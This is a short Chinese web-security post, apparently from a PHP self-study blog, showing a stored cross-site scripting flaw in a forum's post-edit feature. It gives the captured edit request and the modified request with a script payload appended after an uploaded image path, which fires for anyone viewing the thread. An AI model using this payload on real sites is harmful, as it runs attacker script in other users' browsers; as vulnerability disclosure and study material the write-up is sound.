通杀所有版本 先随便发布或回复一个帖子 内容要上传一张图片 发布成功后 编辑内容 并抓包 下面是抓包的内容 得到图片路径 forumID=14&threadID=271&postID=373&postType=&fileCount=0&title=Re%3A%E6%B5%8B%E8%AF%95%E5%B8%96&content=111111111112222222222%3Cimg+src%3D%22%2FBBS%2Fupload%2F2013%2F12%2Ft_27164555796.jpg 修改数据包 在图片地址后面加入攻击代码 forumID=14&threadID=271&postID=373&postType=&fileCount=0&title=Re%3A%E6%B5%8B%E8%AF%95%E5%B8%96&content=111111111112222222222%3Cimg+src%3D%22%2FBBS%2Fupload%2F2013%2F12%2Ft_27164555796.jpg"></textarea><script>alert(/xss/)</script> 再次提交 用户访问帖子时即可触发~
|
-
上一篇: 天天团购可查看任意用户信息(订单号可算出) -
下一篇: CSRF简单介绍及利用方法 - 网站安全 - 自学php
还没有人抢沙发呢~